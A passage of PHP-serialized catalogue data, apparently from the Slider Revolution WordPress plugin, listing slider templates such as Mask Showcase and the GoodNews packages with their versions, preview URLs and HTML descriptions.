href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:147;a:22:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:13:\"Mask Showcase\";s:5:\"alias\";s:12:\"maskshowcase\";s:3:\"zip\";s:16:\"maskshowcase.zip\";s:3:\"uid\";s:32:\"fc943c31e2da9c63b252aeabf554d128\";s:3:\"img\";s:23:\"maskshowcase/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/minimal-mask-showcase/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Mask Showcase template uses gradients and the amazing block layer animations. A minimal slider treat for any website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:148;a:22:{s:2:\"id\";s:3:\"151\";s:5:\"title\";s:20:\"Parallax Zoom Slices\";s:5:\"alias\";s:18:\"parallaxzoomslices\";s:3:\"zip\";s:22:\"parallaxzoomslices.zip\";s:3:\"uid\";s:32:\"83537cae05709ddb9bcb7375470a5894\";s:3:\"img\";s:29:\"parallaxzoomslices/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/parallax-zoom-slices-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:249:\"<span class=\"ttm_content\">This template uses the Slicey Add-On to add a unique effect to slide background images. You can simple change the background images and the slice effect will automatically be applied.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:149;a:22:{s:2:\"id\";s:3:\"152\";s:5:\"title\";s:22:\"Double Exposure Effect\";s:5:\"alias\";s:20:\"doubleexposureeffect\";s:3:\"zip\";s:24:\"doubleexposureeffect.zip\";s:3:\"uid\";s:32:\"8d9229b5cbcf5bda5fbdc6a8e01a2b8c\";s:3:\"img\";s:31:\"doubleexposureeffect/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/wordpress-double-exposure-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">Make any website special with the double exposure effect slider. Use as a header module or anywhere you want!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:150;a:22:{s:2:\"id\";s:3:\"153\";s:5:\"title\";s:24:\"Mountain Parallax Header\";s:5:\"alias\";s:22:\"mountainparallaxheader\";s:3:\"zip\";s:26:\"mountainparallaxheader.zip\";s:3:\"uid\";s:32:\"8dc64663f317a2abdf179bbe341d016e\";s:3:\"img\";s:33:\"mountainparallaxheader/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/mountain-wordpress-parallax-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:192:\"<span class=\"ttm_content\">This template is a cool intro for any page, featuring a striking parallax effect. Just change texts and links and you\'re done!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:151;a:25:{s:2:\"id\";s:3:\"154\";s:5:\"title\";s:26:\"GoodNews One-Pager Package\";s:5:\"alias\";s:26:\"goodnews-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"goodnews-one-pager-package\";s:3:\"img\";s:44:\"packages/templatepack_goodnews_one_pager.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:4:{i:0;s:8:\"carousel\";i:1;s:6:\"slider\";i:2;s:4:\"hero\";i:3;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:152;a:25:{s:2:\"id\";s:3:\"155\";s:5:\"title\";s:13:\"GoodNews Menu\";s:5:\"alias\";s:12:\"goodnewsmenu\";s:3:\"zip\";s:22:\"packs/goodnewsmenu.zip\";s:3:\"uid\";s:32:\"4cbc82501ff340fcdc0acf7eb3ba2640\";s:3:\"img\";s:23:\"goodnewsmenu/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:153;a:25:{s:2:\"id\";s:3:\"156\";s:5:\"title\";s:15:\"GoodNews Header\";s:5:\"alias\";s:14:\"goodnewsheader\";s:3:\"zip\";s:24:\"packs/goodnewsheader.zip\";s:3:\"uid\";s:32:\"c6660b6bdbf596f38466f569596f5259\";s:3:\"img\";s:25:\"goodnewsheader/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:154;a:25:{s:2:\"id\";s:3:\"157\";s:5:\"title\";s:18:\"GoodNews Whats Hot\";s:5:\"alias\";s:16:\"goodnewswhatshot\";s:3:\"zip\";s:26:\"packs/goodnewswhatshot.zip\";s:3:\"uid\";s:32:\"cb841ce64a99a6644adab049cf5405cd\";s:3:\"img\";s:27:\"goodnewswhatshot/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:155;a:25:{s:2:\"id\";s:3:\"158\";s:5:\"title\";s:17:\"GoodNews Featured\";s:5:\"alias\";s:16:\"goodnewsfeatured\";s:3:\"zip\";s:26:\"packs/goodnewsfeatured.zip\";s:3:\"uid\";s:32:\"00bde4b09e3700da7183999eaf137ccc\";s:3:\"img\";s:27:\"goodnewsfeatured/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:156;a:25:{s:2:\"id\";s:3:\"159\";s:5:\"title\";s:18:\"GoodNews Spotlight\";s:5:\"alias\";s:17:\"goodnewsspotlight\";s:3:\"zip\";s:27:\"packs/goodnewsspotlight.zip\";s:3:\"uid\";s:32:\"138076241a828e1c5764379944755f2b\";s:3:\"img\";s:28:\"goodnewsspotlight/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:157;a:25:{s:2:\"id\";s:3:\"160\";s:5:\"title\";s:17:\"GoodNews Carousel\";s:5:\"alias\";s:16:\"goodnewscarousel\";s:3:\"zip\";s:26:\"packs/goodnewscarousel.zip\";s:3:\"uid\";s:32:\"d29d4460a6015e30d08d2714232d3768\";s:3:\"img\";s:27:\"goodnewscarousel/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:158;a:25:{s:2:\"id\";s:3:\"161\";s:5:\"title\";s:16:\"GoodNews Callout\";s:5:\"alias\";s:15:\"goodnewscallout\";s:3:\"zip\";s:25:\"packs/goodnewscallout.zip\";s:3:\"uid\";s:32:\"d9568b3193e96577fae630b3a6728785\";s:3:\"img\";s:26:\"goodnewscallout/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:159;a:25:{s:2:\"id\";s:3:\"162\";s:5:\"title\";s:15:\"GoodNews Footer\";s:5:\"alias\";s:14:\"goodnewsfooter\";s:3:\"zip\";s:24:\"packs/goodnewsfooter.zip\";s:3:\"uid\";s:32:\"34f43f891cb8d55375149dc4bbc38298\";s:3:\"img\";s:25:\"goodnewsfooter/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:160;a:25:{s:2:\"id\";s:3:\"163\";s:5:\"title\";s:29:\"GoodNews Content Page Package\";s:5:\"alias\";s:29:\"goodnews-content-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:29:\"goodnews-content-page-package\";s:3:\"img\";s:55:\"packages/templatepack_goodnews_content_page_package.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:161;a:25:{s:2:\"id\";s:3:\"164\";s:5:\"title\";s:18:\"GoodNews Menu Back\";s:5:\"alias\";s:16:\"goodnewsmenuback\";s:3:\"zip\";s:26:\"packs/goodnewsmenuback.zip\";s:3:\"uid\";s:32:\"1340d1aeefba497a7d404d12a1fceed4\";s:3:\"img\";s:27:\"goodnewsmenuback/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:162;a:25:{s:2:\"id\";s:3:\"165\";s:5:\"title\";s:20:\"GoodNews Blog Header\";s:5:\"alias\";s:18:\"goodnewsblogheader\";s:3:\"zip\";s:28:\"packs/goodnewsblogheader.zip\";s:3:\"uid\";s:32:\"abc4d7c1e48475c6def05f1f6d8bf564\";s:3:\"img\";s:29:\"goodnewsblogheader/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:163;a:25:{s:2:\"id\";s:3:\"166\";s:5:\"title\";s:21:\"GoodNews Blog Content\";s:5:\"alias\";s:19:\"goodnewsblogcontent\";s:3:\"zip\";s:29:\"packs/goodnewsblogcontent.zip\";s:3:\"uid\";s:32:\"bbf34563da6db2779c29599b503b07e9\";s:3:\"img\";s:30:\"goodnewsblogcontent/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:164;a:25:{s:2:\"id\";s:3:\"167\";s:5:\"title\";s:21:\"GoodNews 